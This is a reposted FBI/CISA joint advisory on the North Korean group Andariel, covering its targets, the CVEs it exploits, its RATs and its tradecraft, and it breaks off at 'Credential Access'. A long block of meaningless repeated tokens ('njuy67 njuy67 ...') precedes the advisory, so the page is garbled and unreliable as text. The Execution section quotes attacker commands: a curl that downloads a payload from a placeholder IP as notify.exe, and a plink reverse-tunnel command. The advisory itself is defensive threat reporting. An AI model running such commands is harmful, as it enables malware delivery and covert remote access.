North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs | CISA
- by nlqip
njuy67 njuy67 njuy68 njuy68 njuy69 njuy69 njuy70 njuy70 njuy71 njuy71 njuy72 njuy72 njuy73 njuy73 njuy74 njuy74 njuy75 njuy75 njuy76 njuy76 njuy77 njuy77 njuy78 njuy78 njuy79 njuy79 njuy80 njuy80 njuy81 njuy81 njuy82 njuy82 njuy83 njuy83 njuy84 njuy84 njuy85 njuy85 njuy86 njuy86 njuy87 njuy87 njuy88 njuy88 njuy89 njuy89 njuy90 njuy90 njuy91 njuy91 njuy92 njuy92 njuy93 njuy93 njuy94 njuy94 njuy95 njuy95 njuy96 njuy96 njuy97 njuy97 njuy98 njuy98 njuy99 njuy99 njuy100 njuy100 njuy101 njuy101 njuy102 njuy102 njuy103 njuy103 njuy104 njuy104 njuy105 njuy105 njuy106 njuy106 njuy107 njuy107 njuy108 njuy108 njuy109 njuy109 njuy110 njuy110 njuy111 njuy111 njuy112 njuy112 njuy113 njuy113 njuy114 njuy114 njuy115 njuy115 njuy116 njuy116 njuy117 njuy117 njuy118 njuy118 njuy119 njuy119 njuy120 njuy120 njuy121 njuy121 njuy122 njuy122 njuy123 njuy123 njuy124 njuy124 njuy125 njuy125 njuy126 njuy126 njuy127 njuy127 njuy128 njuy128 njuy129 njuy129 njuy130 njuy130 njuy131 njuy131 njuy132 njuy132 njuy133 njuy133 njuy134 njuy134 njuy135 njuy135 njuy136 njuy136 njuy137 njuy137 njuy138 njuy138 njuy139 njuy139 njuy140 njuy140 njuy141 njuy141 njuy142 njuy142 njuy143 njuy143 njuy144 njuy144 njuy145 njuy145 njuy146 njuy146 njuy147 njuy147 njuy148 njuy148 njuy149 njuy149 njuy150 njuy150 njuy151 njuy151 njuy152 njuy152 njuy153 njuy153 njuy154 njuy154 njuy155 njuy155 njuy156 njuy156 njuy157 njuy157 njuy158 njuy158 njuy159 njuy159 njuy160 njuy160 njuy161 njuy161 njuy162 njuy162 njuy163 njuy163 njuy164 njuy164 njuy165 njuy165 njuy166 njuy166 njuy167 njuy167 njuy168 njuy168 njuy169 njuy169 njuy170 njuy170 njuy171 njuy171 njuy172 njuy172 njuy173 njuy173 njuy174 njuy174 njuy175 njuy175 njuy176 njuy176 njuy177 njuy177 njuy178 njuy178 njuy179 njuy179 njuy180 njuy180 njuy181 njuy181 njuy182 njuy182 njuy183 njuy183 njuy184 njuy184 njuy185 njuy185 njuy186 njuy186 njuy187 njuy187 njuy188 njuy188 njuy189 njuy189 njuy190 njuy190 njuy191 njuy191 njuy192 njuy192 njuy193 njuy193 njuy194 njuy194 njuy195 njuy195 njuy196 njuy196 njuy197 njuy197 njuy198 njuy198 njuy199 njuy199 njuy200 njuy200 njuy201 njuy201 njuy202 njuy202 njuy203 njuy203 njuy204 njuy204 njuy205 njuy205 njuy206 njuy206 njuy207 njuy207 njuy208 njuy208 njuy209 njuy209 njuy210 njuy210 njuy211 njuy211 njuy212 njuy212 njuy213 njuy213 njuy214 njuy214 njuy215 njuy215 njuy216 njuy216 njuy217 njuy217 njuy218 njuy218 njuy219 njuy219 njuy220 njuy220 njuy221 njuy221 njuy222 njuy222 njuy223 njuy223 njuy224 njuy224 njuy225 njuy225 njuy226 njuy226 njuy227 njuy227 njuy228 njuy228 njuy229 njuy229 njuy230 njuy230 njuy231 njuy231 njuy232 njuy232 njuy233 njuy233 njuy234 njuy234 njuy235 njuy235 njuy236 njuy236 njuy237 njuy237 njuy238 njuy238 njuy239 njuy239 njuy240 njuy240 njuy241 njuy241 njuy242 njuy242 njuy243 njuy243 njuy244 njuy244 njuy245 njuy245 njuy246 njuy246 njuy247 njuy247 njuy248 njuy248 njuy249 njuy249 njuy250 njuy250 njuy251 njuy251 njuy252 njuy252 njuy253 njuy253 njuy254 njuy254 njuy255 njuy255 njuy256 njuy256 njuy257 njuy257 njuy258 njuy258 njuy259 njuy259 njuy260 njuy260 njuy261 njuy261 njuy262 njuy262 njuy263 njuy263 njuy264 njuy264 njuy265 njuy265 njuy266 njuy266 njuy267 njuy267 njuy268 njuy268 njuy269 njuy269 njuy270 njuy270 njuy271 njuy271 njuy272 njuy272 njuy273 njuy273 njuy274 njuy274 njuy275 njuy275 njuy276 njuy276 njuy277 njuy277 njuy278 njuy278 njuy279 njuy279 njuy280 njuy280 njuy281 njuy281 njuy282 njuy282 njuy283 njuy283 njuy284 njuy284 njuy285 njuy285 njuy286 njuy286 njuy287 njuy287 njuy288 njuy288 njuy289 njuy289 njuy290 njuy290 njuy291 njuy291 njuy292 njuy292 njuy293 njuy293 njuy294 njuy294 njuy295 njuy295 njuy296 njuy296 njuy297 njuy297 njuy298 njuy298 njuy299 njuy299 njuy300 njuy300 njuy301 njuy301 njuy302 njuy302 njuy303 njuy303 njuy304 njuy304 njuy305 njuy305 njuy306 njuy306 njuy307 njuy307 njuy308 njuy308 njuy309 njuy309 njuy310 njuy310 njuy311 njuy311 njuy312 njuy312 njuy313 njuy313 njuy314 njuy314 njuy315 njuy315 njuy316 njuy316 njuy317 njuy317 njuy318 njuy318 njuy319 njuy319 njuy320 njuy320 njuy321 njuy321 njuy322 njuy322 njuy323 njuy323 njuy324 njuy324 njuy325 njuy325 njuy326 njuy326 njuy327 njuy327 njuy328 njuy328 njuy329 njuy329 njuy330 njuy330 njuy331 njuy331 njuy332 njuy332 njuy333 njuy333 njuy334 njuy334 njuy335 njuy335 njuy336 njuy336 njuy337 njuy337 njuy338 njuy338 njuy339 njuy339 njuy340 njuy340 njuy341 njuy341 njuy342 njuy342 njuy343 njuy343 njuy344 njuy344 njuy345 njuy345 njuy346 njuy346 njuy347 njuy347 njuy348 njuy348 njuy349 njuy349 njuy350 njuy350 njuy351 njuy351 njuy352 njuy352 njuy353 njuy353 njuy354 njuy354 njuy355 njuy355 njuy356 njuy356 njuy357 njuy357 njuy358 njuy358 njuy359 njuy359 njuy360 njuy360 njuy361 njuy361 njuy362 njuy362 njuy363 njuy363 njuy364 njuy364 njuy365 njuy365 njuy366 njuy366 njuy367 njuy367 njuy368 njuy368 njuy369 njuy369 njuy370 njuy370 njuy371 njuy371 njuy372 njuy372 njuy373 njuy373 njuy374 njuy374 njuy375 njuy375 njuy376 njuy376 njuy377 njuy377 njuy378 njuy378 njuy379 njuy379 njuy380 njuy380 njuy381 njuy381 njuy382 njuy382 njuy383 njuy383 njuy384 njuy384 njuy385 njuy385 njuy386 njuy386 njuy387 njuy387 njuy388 njuy388 njuy389 njuy389 njuy390 njuy390 njuy391 njuy391 njuy392 njuy392 njuy393 njuy393 njuy394 njuy394 njuy395 njuy395 njuy396 njuy396 njuy397 njuy397 njuy398 njuy398 njuy399 njuy399 njuy400 njuy400 njuy401 njuy401 njuy402 njuy402 njuy403 njuy403 njuy404 njuy404 njuy405 njuy405 njuy406 njuy406 njuy407 njuy407 njuy408 njuy408 njuy409 njuy409 njuy410 njuy410 njuy411 njuy411 njuy412 njuy412 njuy413 njuy413 njuy414 njuy414 njuy415 njuy415 njuy416 njuy416 njuy417 njuy417 njuy418 njuy418 njuy419 njuy419 njuy420 njuy420 njuy421 njuy421 njuy422 njuy422 njuy423 njuy423 njuy424 njuy424 njuy425 njuy425 njuy426 njuy426 njuy427 njuy427 njuy428 njuy428 njuy429 njuy429 njuy430 njuy430 njuy431 njuy431 njuy432 njuy432 njuy433 njuy433 njuy434 njuy434 njuy435 njuy435 njuy436 njuy436 njuy437 njuy437 njuy438 njuy438 njuy439 njuy439 njuy440 njuy440 njuy441 njuy441 njuy442 njuy442 njuy443 njuy443 njuy444 njuy444 njuy445 njuy445 njuy446 njuy446 njuy447 njuy447 njuy448 njuy448 njuy449 njuy449 njuy450 njuy450 njuy451 njuy451 njuy452 njuy452 njuy453 njuy453 njuy454 njuy454 njuy455 njuy455 njuy456 njuy456 njuy457 njuy457 njuy458 njuy458 njuy459 njuy459 njuy460 njuy460 njuy461 njuy461 njuy462 njuy462 njuy463 njuy463 njuy464 njuy464 njuy465 njuy465 njuy466 njuy466 njuy467 njuy467 njuy468 njuy468 njuy469 njuy469 njuy470 njuy470 njuy471 njuy471 njuy472 njuy472 njuy473 njuy473 njuy474 njuy474 njuy475 njuy475 njuy476 njuy476 njuy477 njuy477 njuy478 njuy478 njuy479 njuy479 njuy480 njuy480 njuy481 njuy481 njuy482 njuy482 njuy483 njuy483 njuy484 njuy484 njuy485 njuy485 njuy486 njuy486 njuy487 njuy487 njuy488 njuy488 njuy489 njuy489 njuy490 njuy490 njuy491 njuy491 njuy492 njuy492 njuy493 njuy493 njuy494 njuy494 njuy495 njuy495 njuy496 njuy496 njuy497 njuy497 njuy498 njuy498 njuy499 njuy499 njuy500 njuy500 njuy501 njuy501 njuy502 njuy502 njuy503 njuy503 njuy504 njuy504 njuy505 njuy505 njuy506 njuy506 njuy507 njuy507 njuy508 njuy508 njuy509 njuy509 njuy510 njuy510 njuy511 njuy511 njuy512 njuy512 njuy513 njuy513 njuy514 njuy514 njuy515 njuy515 njuy516 njuy516 njuy517 njuy517 njuy518 njuy518 njuy519 njuy519 njuy520 njuy520 njuy521 njuy521 njuy522 njuy522 njuy523 njuy523 njuy524 njuy524 njuy525 njuy525 njuy526 njuy526 njuy527 njuy527 njuy528 njuy528 njuy529 njuy529 njuy530 njuy530 njuy531 njuy531 njuy532 njuy532 njuy533 njuy533 njuy534 njuy534 njuy535 njuy535 njuy536 njuy536 njuy537 njuy537 njuy538 njuy538 njuy539 njuy539 njuy540 njuy540 njuy541 njuy541 njuy542 njuy542 njuy543 njuy543 njuy544 njuy544 njuy545 njuy545 njuy546 njuy546 njuy547 njuy547 njuy548 njuy548 njuy549 njuy549 njuy550 njuy550 njuy551 njuy551 njuy552 njuy552 njuy553 njuy553 njuy554 njuy554 njuy555 njuy555 njuy556 njuy556 njuy557 njuy557 njuy558 njuy558 njuy559 njuy559 njuy560 njuy560 njuy561 njuy561 njuy562 njuy562 njuy563 njuy563 njuy564 njuy564 njuy565 njuy565 njuy566 njuy566 njuy567 njuy567 njuy568 njuy568 njuy569 njuy569 njuy570 njuy570 njuy571 njuy571 njuy572 njuy572 njuy573 njuy573 njuy574 njuy574 njuy575 njuy575 njuy576 njuy576 njuy577 njuy577 njuy578 njuy578 njuy579 njuy579 njuy580 njuy580 njuy581 njuy581 njuy582 njuy582 njuy583 njuy583 njuy584 njuy584 njuy585 njuy585 njuy586 njuy586 njuy587 njuy587 njuy588 njuy588 njuy589 njuy589 njuy590 njuy590 njuy591 njuy591 njuy592 njuy592 njuy593 njuy593 njuy594 njuy594 njuy595 njuy595 njuy596 njuy596 njuy597 njuy597 njuy598 njuy598 njuy599 njuy599 njuy600 njuy600 njuy601 njuy601 njuy602 njuy602 njuy603 njuy603 njuy604 njuy604 njuy605 njuy605 njuy606 njuy606 njuy607 njuy607 njuy608 njuy608 njuy609 njuy609 njuy610 njuy610 njuy611 njuy611 njuy612 njuy612 njuy613 njuy613 njuy614 njuy614 njuy615 njuy615 njuy616 njuy616 njuy617 njuy617 njuy618 njuy618 njuy619 njuy619 njuy620 njuy620 njuy621 njuy621 njuy622 njuy622 njuy623 njuy623 njuy624 njuy624 njuy625 njuy625 njuy626 njuy626 njuy627 njuy627 njuy628 njuy628 njuy629 njuy629 njuy630 njuy630 njuy631 njuy631 njuy632 njuy632 njuy633 njuy633 njuy634 njuy634 njuy635 njuy635 njuy636 njuy636 njuy637 njuy637 njuy638 njuy638 njuy639 njuy639 njuy640 njuy640 njuy641 njuy641 njuy642 njuy642 njuy643 njuy643 njuy644 njuy644 njuy645 njuy645 njuy646 njuy646 njuy647 njuy647 njuy648 njuy648 njuy649 njuy649 njuy650 njuy650 njuy651 njuy651 njuy652 njuy652 njuy653 njuy653 njuy654 njuy654 njuy655 njuy655 njuy656 njuy656 njuy657 njuy657 njuy658 njuy658 njuy659 njuy659 njuy660 njuy660 njuy661 njuy661 njuy662 njuy662 njuy663 njuy663 njuy664 njuy664 njuy665 njuy665 njuy666 njuy666 njuy667 njuy667 njuy668 njuy668 njuy669 njuy669 njuy670 njuy670 njuy671 njuy671 njuy672 njuy672 njuy673 njuy673 njuy674 njuy674 njuy675 njuy675 njuy676 njuy676 njuy677 njuy677 njuy678 njuy678 njuy679 njuy679 njuy680 njuy680 njuy681 njuy681 njuy682 njuy682 njuy683 njuy683 njuy684 njuy684 njuy685 njuy685 njuy686 njuy686 njuy687 njuy687 njuy688 njuy688 njuy689 njuy689 njuy690 njuy690 njuy691 njuy691 njuy692 njuy692 njuy693 njuy693 njuy694 njuy694 njuy695 njuy695 njuy696 njuy696 njuy697 njuy697 njuy698 njuy698 njuy699 njuy699 njuy700 njuy700 njuy701 njuy701 njuy702 njuy702 njuy703 njuy703 njuy704 njuy704 njuy705 njuy705 njuy706 njuy706 njuy707 njuy707 njuy708 njuy708 njuy709 njuy709 njuy710 njuy710 njuy711 njuy711 njuy712 njuy712 njuy713 njuy713 njuy714 njuy714 njuy715 njuy715 njuy716 njuy716 njuy717 njuy717 njuy718 njuy718 njuy719 njuy719 njuy720 njuy720 njuy721 njuy721 njuy722 njuy722 njuy723 njuy723 njuy724 njuy724 njuy725 njuy725 njuy726 njuy726 njuy727 njuy727 njuy728 njuy728 njuy729 njuy729 njuy730 njuy730 njuy731 njuy731 njuy732 njuy732 njuy733 njuy733 njuy734 njuy734 njuy735 njuy735 njuy736 njuy736 njuy737 njuy737 njuy738 njuy738 njuy739 njuy739 njuy740 njuy740 njuy741 njuy741 njuy742 njuy742 njuy743 njuy743 njuy744 njuy744 njuy745 njuy745 njuy746 njuy746 njuy747 njuy747 njuy748 njuy748 njuy749 njuy749 njuy750 njuy750 njuy751 njuy751 njuy752 njuy752 njuy753 njuy753 njuy754 njuy754 njuy755 njuy755 njuy756 njuy756 njuy757 njuy757 njuy758 njuy758 njuy759 njuy759 njuy760 njuy760 njuy761 njuy761 njuy762 njuy762 njuy763 njuy763 njuy764 njuy764 njuy765 njuy765 njuy766 njuy766 njuy767 njuy767 njuy768 njuy768 njuy769 njuy769 njuy770 njuy770 njuy771 njuy771 njuy772 njuy772 njuy773 njuy773 njuy774 njuy774 njuy775 njuy775 njuy776 njuy776 njuy777 njuy777 njuy778 njuy778 njuy779 njuy779 njuy780 njuy780 njuy781 njuy781 njuy782 njuy782 njuy783 njuy783 njuy784 njuy784 njuy785 njuy785 njuy786 njuy786 njuy787 njuy787 njuy788 njuy788 njuy789 njuy789 njuy790 njuy790 njuy791 njuy791 njuy792 njuy792 njuy793 njuy793 njuy794 njuy794 njuy795 njuy795 njuy796 njuy796 njuy797 njuy797 njuy798 njuy798 njuy799 njuy799 njuy800 njuy800 njuy801 njuy801 njuy802 njuy802 njuy803 njuy803 njuy804 njuy804 njuy805 njuy805 njuy806 njuy806 njuy807 njuy807 njuy808 njuy808 njuy809 njuy809 njuy810 njuy810 njuy811 njuy811 njuy812 njuy812 njuy813 njuy813 njuy814 njuy814 njuy815 njuy815 njuy816 njuy816 njuy817 njuy817 njuy818 njuy818 njuy819 njuy819 njuy820 njuy820 njuy821 njuy821 njuy822 njuy822 njuy823 njuy823 njuy824 njuy824 njuy825 njuy825 njuy826 njuy826 njuy827 njuy827 njuy828 njuy828 njuy829 njuy829 njuy830 njuy830 njuy831 njuy831 njuy832 njuy832 njuy833 njuy833 njuy834 njuy834 njuy835 njuy835 njuy836 njuy836 njuy837 njuy837 njuy838 njuy838 njuy839 njuy839 njuy840 njuy840 njuy841 njuy841 njuy842 njuy842 njuy843 njuy843 njuy844 njuy844 njuy845 njuy845 njuy846 njuy846 njuy847 njuy847 njuy848 njuy848 njuy849 njuy849 njuy850 njuy850 njuy851 njuy851 njuy852 njuy852 njuy853 njuy853 njuy854 njuy854 njuy855 njuy855 njuy856 njuy856 njuy857 njuy857 njuy858 njuy858 njuy859 njuy859 njuy860 njuy860 njuy861 njuy861 njuy862 njuy862 njuy863 njuy863 njuy864 njuy864 njuy865 njuy865 njuy866 njuy866 njuy867 njuy867 njuy868 njuy868 njuy869 njuy869 njuy870 njuy870 njuy871 njuy871 njuy872 njuy872 njuy873 njuy873 njuy874 njuy874 njuy875 njuy875 njuy876 njuy876 njuy877 njuy877 njuy878 njuy878 njuy879 njuy879 njuy880 njuy880 njuy881 njuy881 njuy882 njuy882 njuy883 njuy883 njuy884 njuy884 njuy885 njuy885 njuy886 njuy886 njuy887 njuy887 njuy888 njuy888 njuy889 njuy889 njuy890 njuy890 njuy891 njuy891 njuy892 njuy892 njuy893 njuy893 njuy894 njuy894 njuy895 njuy895 njuy896 njuy896 njuy897 njuy897 njuy898 njuy898 njuy899 njuy899 njuy900 njuy900 njuy901 njuy901 njuy902 njuy902 njuy903 njuy903 njuy904 njuy904 njuy905 njuy905 njuy906 njuy906 njuy907 njuy907 njuy908 njuy908 njuy909 njuy909 njuy910 njuy910 njuy911 njuy911 njuy912 njuy912 njuy913 njuy913 njuy914 njuy914 njuy915 njuy915 njuy916 njuy916 njuy917 njuy917 njuy918 njuy918 njuy919 njuy919 njuy920 njuy920 njuy921 njuy921 njuy922 njuy922 njuy923 njuy923 njuy924 njuy924 njuy925 njuy925 njuy926 njuy926 njuy927 njuy927 njuy928 njuy928 njuy929 njuy929 njuy930 njuy930 njuy931 njuy931 njuy932 njuy932 njuy933 njuy933 njuy934 njuy934 njuy935 njuy935 njuy936 njuy936 njuy937 njuy937 njuy938 njuy938 njuy939 njuy939 njuy940 njuy940 njuy941 njuy941 njuy942 njuy942 njuy943 njuy943 njuy944 njuy944 njuy945 njuy945 njuy946 njuy946 njuy947 njuy947 njuy948 njuy948 njuy949 njuy949 njuy950 njuy950 njuy951 njuy951 njuy952 njuy952 njuy953 njuy953 njuy954 njuy954 njuy955 njuy955 njuy956 njuy956 njuy957 njuy957 njuy958 njuy958 njuy959 njuy959 njuy960 njuy960 njuy961 njuy961 njuy962 njuy962 njuy963 njuy963 njuy964 njuy964 njuy965 njuy965 njuy966 njuy966 njuy967 njuy967 njuy968 njuy968 njuy969 njuy969 njuy970 njuy970 njuy971 njuy971 njuy972 njuy972 njuy973 njuy973 njuy974 njuy974 njuy975 njuy975 njuy976 njuy976 njuy977 njuy977 njuy978 njuy978 njuy979 njuy979 njuy980 njuy980 njuy981 njuy981 njuy982 njuy982 njuy983 njuy983 njuy984 njuy984 njuy985 njuy985 njuy986 njuy986 njuy987 njuy987 njuy988 njuy988 njuy989 njuy989 njuy990 njuy990 njuy991 njuy991 njuy992 njuy992 njuy993 njuy993 njuy994 njuy994 njuy995 njuy995 njuy996 njuy996 njuy997 njuy997 njuy998 njuy998 njuy999 njuy999 njuy1000 njuy1000 njuy1001 njuy1001 njuy1002 njuy1002 njuy1003 njuy1003 njuy1004 njuy1004 njuy1005 njuy1005 njuy1006 njuy1006 njuy1007 njuy1007 njuy1008 njuy1008 njuy1009 njuy1009 njuy1010 njuy1010 njuy1011 njuy1011 njuy1012 njuy1012 njuy1013 njuy1013 njuy1014 njuy1014 njuy1015 njuy1015 njuy1016 njuy1016 njuy1017 njuy1017 njuy1018 njuy1018 njuy1019 njuy1019 njuy1020 njuy1020 njuy1021 njuy1021 njuy1022 njuy1022 njuy1023 njuy1023 njuy1024 njuy1024 njuy1025 njuy1025 njuy1026 njuy1026 njuy1027 njuy1027 njuy1028 njuy1028 njuy1029 njuy1029 njuy1030 njuy1030 njuy1031 njuy1031 njuy1032 njuy1032 njuy1033 njuy1033 njuy1034 njuy1034 njuy1035 njuy1035 njuy1036 njuy1036 njuy1037 njuy1037 njuy1038 njuy1038 njuy1039 njuy1039 njuy1040 njuy1040 njuy1041 njuy1041 njuy1042 njuy1042 njuy1043 njuy1043 njuy1044 njuy1044 njuy1045 njuy1045 njuy1046 njuy1046 njuy1047 njuy1047 njuy1048 njuy1048 njuy1049 njuy1049 njuy1050 njuy1050 njuy1051 njuy1051 njuy1052 njuy1052 njuy1053 njuy1053 njuy1054 njuy1054 njuy1055 njuy1055 njuy1056 njuy1056 njuy1057 njuy1057 njuy1058 njuy1058 njuy1059 njuy1059 njuy1060 njuy1060 njuy1061 njuy1061 njuy1062 njuy1062 njuy1063 njuy1063 njuy1064 njuy1064 njuy1065 njuy1065 njuy1066 njuy1066 njuy1067 njuy1067 njuy1068 njuy1068 njuy1069 njuy1069 njuy1070 njuy1070 njuy1071 njuy1071 njuy1072 njuy1072 njuy1073 njuy1073 njuy1074 njuy1074 njuy1075 njuy1075 njuy1076 njuy1076 njuy1077 njuy1077 njuy1078 njuy1078 njuy1079 njuy1079 njuy1080 njuy1080 njuy1081 njuy1081 njuy1082 njuy1082 njuy1083 njuy1083 njuy1084 njuy1084 njuy1085 njuy1085 njuy1086 njuy1086 njuy1087 njuy1087 njuy1088 njuy1088 njuy1089 njuy1089 njuy1090 njuy1090 njuy1091 njuy1091 njuy1092 njuy1092 njuy1093 njuy1093 njuy1094 njuy1094 njuy1095 njuy1095 njuy1096 njuy1096 njuy1097 njuy1097 njuy1098 njuy1098 njuy1099 njuy1099 njuy1100 njuy1100 njuy1101 njuy1101 njuy1102 njuy1102 njuy1103 njuy1103 njuy1104 njuy1104 njuy1105 njuy1105 njuy1106 njuy1106 njuy1107 njuy1107 njuy1108 njuy1108 njuy1109 njuy1109 njuy1110 njuy1110 njuy1111 njuy1111 njuy1112 njuy1112 njuy1113 njuy1113 njuy1114 njuy1114 njuy1115 njuy1115 njuy1116 njuy1116 njuy1117 njuy1117 njuy1118 njuy1118 njuy1119 njuy1119 njuy1120 njuy1120 njuy1121 njuy1121 njuy1122 njuy1122 njuy1123 njuy1123 njuy1124 njuy1124 njuy1125 njuy1125 njuy1126 njuy1126 njuy1127 njuy1127The U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this Cybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau based in Pyongyang and Sinuiju:
The RGB 3rd Bureau includes a DPRK (aka North Korean) state-sponsored cyber group known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The group primarily targets defense, aerospace, nuclear, and engineering entities to obtain sensitive and classified technical information and intellectual property to advance the regime’s military and nuclear programs and ambitions. The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan and India. RGB 3rd Bureau actors fund their espionage activity through ransomware operations against U.S. healthcare entities.
The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration.
The actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.
The authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a timely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections. While not exclusive, entities involved in or associated with the below industries and fields should remain vigilant in defending their networks from North Korea state-sponsored cyber operations:
Andariel (also known as Onyx Sleet, formerly PLUTONIUM, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa) is a North Korean state-sponsored cyber group, under the RGB 3rd Bureau, based in Pyongyang and Sinuiju. The authoring agencies assess the group has evolved from conducting destructive attacks targeting U.S. and South Korean organizations to conducting specialized cyber espionage and ransomware operations.
The actors currently target sensitive military information and intellectual property of defense, aerospace, nuclear, engineering organizations. To a lesser extent, the group targets medical and energy industries. See Table 1 for more victimology information.
Industry | Information Targeted |
---|---|
Defense |
|
Aerospace |
|
Nuclear |
|
Engineering |
|
The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense programs.
Ransomware
Andariel actors fund their espionage activity through ransomware operations against U.S. healthcare entities, and in some instances, the authoring agencies have observed the actors launching ransomware attacks and conducting cyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same entity. For more information on this ransomware activity, see joint advisories #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities and North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.
Malicious Cyber Espionage Activity
This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques.
Reconnaissance and Enumeration
While there is limited available information on the group’s initial reconnaissance methods, the actors likely identify vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in public-facing web servers [T1595, T1592]. The actors gather open source information about their victims for use in targeting [T1591] and research Common Vulnerabilities and Exposures (CVEs) when published to the National Institute of Standards and Technology (NIST) National Vulnerability Database [T1596]. CVEs researched include:
- CVE-2023-46604 – Apache ActiveMQ
- CVE-2023-42793 – TeamCity
- CVE-2023-3519 – Citrix NetScaler
- CVE-2023-35078 – Ivanti Endpoint Manager Mobile (EPMM)
- CVE-2023-34362 – MOVEIt
- CVE-2023-33246 – RocketMQ
- CVE-2023-32784 – KeePass
- CVE-2023-32315 – Openfire
- CVE-2023-3079 – Google Chromium V8 Type Confusion
- CVE-2023-28771 and CVE-2023-33010 – Zyxell firmware
- CVE-2023-2868 – Barracuda Email Security Gateway
- CVE-2023-27997 – FortiGate SSL VPN
- CVE-2023-25690 – Apache HTTP Server
- CVE-2023-21932 – Oracle Hospitality Opera 5
- CVE-2023-0669 – GoAnywhere MFT
- CVE-2022-47966 – ManageEngine
- CVE-2022-41352 and CVE-2022-27925 – Zimbra Collaboration Suite
- CVE-2022-30190 – Microsoft Windows Support Diagnostic Tool
- CVE-2022-25064 – TP-LINK
- CVE-2022-24990 and CVE-2021-45837 – TerraMaster NAS
- CVE-2022-24785 – Moment.js
- CVE-2022-24665, CVE-2022-24664, and CVE-2022-24663 – PHP Everywhere
- CVE-2022-22965 – Spring4Shell
- CVE-2022-22947 – Spring Cloud Gateway
- CVE-2022-22005 – Microsoft SharePoint Server
- CVE-2022-21882 – Win32k Elevation of Privilege
- CVE-2021-44228 – Apache Log4j
- CVE-2021-44142 – Samba vfs_fruit module
- CVE-2021-43226, CEV-2021-43207, CVE-2021-36955 – Windows log file vulnerabilities
- CVE-2021-41773 – Apache HTTP Server 2.4.49
- CVE-2021-40684 – Talend ESB Runtime
- CVE-2021-3018 – IPeakCMS 3.5
- CVE-2021-20038 – SMA100 Apache httpd server (SonicWall)
- CVE-2021-20028 – SonicWall Secure Remote Access (SRA)
- CVE-2019-15637 – Tableau
- CVE-2019-7609 – Kibana
- CVE-2019-0708 – Microsoft Remote Desktop Services
- CVE-2017-4946 – VMware V4H and V4PA
Resource Development, Tooling, and Remote Access Tools
The actors leverage custom tools and malware for discovery and execution. Over the last 15 years, the group has developed RATs, including the following, to permit remote access and manipulation of systems and lateral movement.
- Atharvan
- ELF Backdoor
- Jupiter
- MagicRAT
- “No Pineapple”
- TigerRAT
- Valefor/VSingle
- ValidAlpha
- YamaBot
- NukeSped
- Goat RAT
- Black RAT
- AndarLoader
- DurianBeacon
- Trifaux
- KaosRAT
- Preft
- Andariel Scheduled Task Malware
- BottomLoader (see Cisco Talos blog Operation Blacksmith)
- NineRAT (see Cisco Talos blog Operation Blacksmith)
- DLang (see Cisco Talos blog Operation Blacksmith)
- Nestdoor (see AhnLab blog)
These tools include functionality for executing arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing to files, capturing network connections, and uploading content to command and control (C2) [T1587.001, T1587.004]. The tools allow the actors to maintain access to the victim system with each implant having a designated C2 node.
Commodity Malware
Commodity malware is malicious software widely available for purchase or use and is leveraged by numerous different threat actors. The use of publicly available malware enables the actors to conceal and obfuscate their identities and leads to attribution problems. The authoring agencies are reliant on the use of custom malware and loaders, along with overlapping C2 nodes to attribute commodity malware to the actors. The actors have at times achieved great success leveraging just open source malware. The authoring agencies have identified the following open-source tools as used and/or customized by the actors:
Initial Access
The actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such as CVE-2021-44228 (“Log4Shell”) in Apache’s Log4j software library and other CVEs listed above, to deploy web shells and gain access to sensitive information and applications for further exploitation. The actors continue to breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted widespread activity against a number of different organizations simultaneously [T1190].
Execution
The actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL). They use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC), and Linux bash, for system, network, and account enumeration. While individual commands typically vary, the authoring agencies assess the actors prefer netstat
commands, such as netstat –naop
and netstat –noa
[T1059]. Example commands used by the actors include the following:
netstat –naop
netstat –noa
pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] <Remote_IP>
curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:userspublicnotify[.]exe
C:windowssystem32cmd.exe /c systeminfo | findstr Logon
These actors often make typos and other mistakes, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach. The typos also illustrate a poor grasp of the English language, including common errors such as “Microsoft Cooperation” (rather than “Microsoft Corporation”) found across numerous RGB 3rd Bureau malware samples.
Defense Evasion
The actors routinely pack late-stage tooling in VMProtect and Themida. Malicious tooling packed with these and other commercial tools have advanced anti-debugging and detection capabilities. These files are typically multiple megabytes in size and often contain unusual file section names such as vmp0
and vmp1
for VMProtect and Themida or randomized file section names for Themida [T1027].
Credential Access
